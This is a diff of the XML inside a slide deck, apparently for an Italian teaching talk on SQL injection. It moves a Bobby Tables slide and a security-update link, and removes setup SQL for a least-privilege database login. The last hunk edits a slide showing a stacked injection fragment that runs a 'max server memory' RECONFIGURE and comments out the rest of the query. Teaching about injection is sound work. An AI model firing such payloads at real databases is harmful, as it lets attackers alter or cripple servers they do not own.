+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="3017508" y="2063441"/>
+            <a:ext cx="3108984" cy="2562177"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3973934878"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide44.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 118">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F88D046-96ED-2B53-2887-BD66C18CC8B9}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="119" name="Google Shape;119;p30">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D121D8B8-EB67-47D1-E250-A5F41CBEED4A}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1893525" y="1490741"/>
+            <a:ext cx="5356950" cy="572700"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en" dirty="0"/>
+              <a:t>Non solo front-end</a:t>
+            </a:r>
+            <a:endParaRPr dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="120" name="Google Shape;120;p30">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0BE3B9B-C834-B8BB-90A0-DE3B3FBC5426}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr preferRelativeResize="0"/>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3">
+            <a:alphaModFix/>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4116500" y="448013"/>
+            <a:ext cx="911000" cy="911000"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+      </p:pic>
       <p:sp>
         <p:nvSpPr>
           <p:cNvPr id="2" name="Google Shape;130;p31">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64B81C62-F688-1923-82CB-8633F6C98316}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1755B24A-5122-EF7A-F2FC-66195D9795BD}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -24015,8 +25432,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="1128450" y="2195169"/>
-            <a:ext cx="6887100" cy="2292051"/>
+            <a:off x="1128450" y="4263163"/>
+            <a:ext cx="6887100" cy="224056"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -24038,176 +25455,11 @@
               <a:buSzPts val="1600"/>
             </a:pPr>
             <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>USE master;</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-            </a:br>
-            <a:br>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>CREATE LOGIN '</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>myappuser</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>' WITH PASSWORD 'YourStrong@Passw0rd’;</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-            </a:br>
-            <a:br>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>USE </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>myappdb</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>;</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-            </a:br>
-            <a:br>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>CREATE USER '</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>myappuser</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>' FOR LOGIN '</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>myappuser</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>';</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>ALTER ROLE [</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>db_datareader</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>] ADD MEMBER '</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>myappuser</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>';</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>ALTER ROLE [</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>db_datawriter</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>] ADD MEMBER '</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>myappuser</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>';</a:t>
+              <a:rPr lang="en-US" sz="1050" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+                <a:hlinkClick r:id="rId4"/>
+              </a:rPr>
+              <a:t>https://sqlserverupdates.com/news/new-security-updates-to-fix-sql-injection-vulnerabilities/</a:t>
             </a:r>
             <a:br>
               <a:rPr lang="en-US" sz="1400" dirty="0">
@@ -24220,10 +25472,40 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="6" name="Picture 5">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D31E37A7-F646-67C6-41BE-2569672EAD77}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId5"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="3288207" y="1999776"/>
+            <a:ext cx="2567586" cy="2160568"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="241180902"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3022525534"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -24233,190 +25515,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide41.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name="Shape 118"/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="119" name="Google Shape;119;p30"/>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="2288581" y="1497613"/>
-            <a:ext cx="4566836" cy="572700"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
-            <a:noAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en" dirty="0"/>
-              <a:t>Bobby Tables (xkcd.com #327)</a:t>
-            </a:r>
-            <a:endParaRPr dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:pic>
-        <p:nvPicPr>
-          <p:cNvPr id="120" name="Google Shape;120;p30"/>
-          <p:cNvPicPr preferRelativeResize="0"/>
-          <p:nvPr/>
-        </p:nvPicPr>
-        <p:blipFill>
-          <a:blip r:embed="rId3">
-            <a:alphaModFix/>
-          </a:blip>
-          <a:stretch>
-            <a:fillRect/>
-          </a:stretch>
-        </p:blipFill>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="4116500" y="448013"/>
-            <a:ext cx="911000" cy="911000"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-      </p:pic>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="122" name="Google Shape;122;p30"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1311750" y="2070313"/>
-            <a:ext cx="6520500" cy="169200"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en" sz="1100" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="B7B7B7"/>
-                </a:solidFill>
-                <a:latin typeface="Barlow Condensed"/>
-                <a:ea typeface="Barlow Condensed"/>
-                <a:cs typeface="Barlow Condensed"/>
-                <a:sym typeface="Barlow Condensed"/>
-              </a:rPr>
-              <a:t>Molto più di una textbox</a:t>
-            </a:r>
-            <a:endParaRPr sz="1100" dirty="0">
-              <a:solidFill>
-                <a:srgbClr val="B7B7B7"/>
-              </a:solidFill>
-              <a:latin typeface="Barlow Condensed"/>
-              <a:ea typeface="Barlow Condensed"/>
-              <a:cs typeface="Barlow Condensed"/>
-              <a:sym typeface="Barlow Condensed"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:pic>
-        <p:nvPicPr>
-          <p:cNvPr id="3" name="Picture 2" descr="A cartoon of two people&#10;&#10;AI-generated content may be incorrect.">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74250F4B-E526-08C0-F935-DD5E12CE8501}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvPicPr>
-            <a:picLocks noChangeAspect="1"/>
-          </p:cNvPicPr>
-          <p:nvPr/>
-        </p:nvPicPr>
-        <p:blipFill>
-          <a:blip r:embed="rId4"/>
-          <a:stretch>
-            <a:fillRect/>
-          </a:stretch>
-        </p:blipFill>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1594451" y="2432471"/>
-            <a:ext cx="5955097" cy="1834814"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-      </p:pic>
-    </p:spTree>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide42.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide45.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:bg>
@@ -24516,6 +25615,189 @@
           </a:p>
         </p:txBody>
       </p:sp>
+    </p:spTree>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide46.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 118"/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="119" name="Google Shape;119;p30"/>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="2288581" y="1497613"/>
+            <a:ext cx="4566836" cy="572700"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en" dirty="0"/>
+              <a:t>Bobby Tables (xkcd.com #327)</a:t>
+            </a:r>
+            <a:endParaRPr dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="120" name="Google Shape;120;p30"/>
+          <p:cNvPicPr preferRelativeResize="0"/>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3">
+            <a:alphaModFix/>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4116500" y="448013"/>
+            <a:ext cx="911000" cy="911000"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+      </p:pic>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="122" name="Google Shape;122;p30"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1311750" y="2070313"/>
+            <a:ext cx="6520500" cy="169200"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en" sz="1100" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="B7B7B7"/>
+                </a:solidFill>
+                <a:latin typeface="Barlow Condensed"/>
+                <a:ea typeface="Barlow Condensed"/>
+                <a:cs typeface="Barlow Condensed"/>
+                <a:sym typeface="Barlow Condensed"/>
+              </a:rPr>
+              <a:t>Molto più di una textbox</a:t>
+            </a:r>
+            <a:endParaRPr sz="1100" dirty="0">
+              <a:solidFill>
+                <a:srgbClr val="B7B7B7"/>
+              </a:solidFill>
+              <a:latin typeface="Barlow Condensed"/>
+              <a:ea typeface="Barlow Condensed"/>
+              <a:cs typeface="Barlow Condensed"/>
+              <a:sym typeface="Barlow Condensed"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="3" name="Picture 2" descr="A cartoon of two people&#10;&#10;AI-generated content may be incorrect.">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74250F4B-E526-08C0-F935-DD5E12CE8501}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId4"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1594451" y="2432471"/>
+            <a:ext cx="5955097" cy="1834814"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
     </p:spTree>
   </p:cSld>
   <p:clrMapOvr>

--- a/2025-10-21.PirlOverflow - SQL Injection crash(ed) course.pptx
+++ b/2025-10-21.PirlOverflow - SQL Injection crash(ed) course.pptx
@@ -20225,7 +20225,7 @@
                 </a:solidFill>
                 <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
               </a:rPr>
-              <a:t> 'max server memory (MB)’, 128; RECONFIGURE;--</a:t>
+              <a:t> 'max server memory (MB)', 128; RECONFIGURE;--</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" sz="1400" dirty="0">
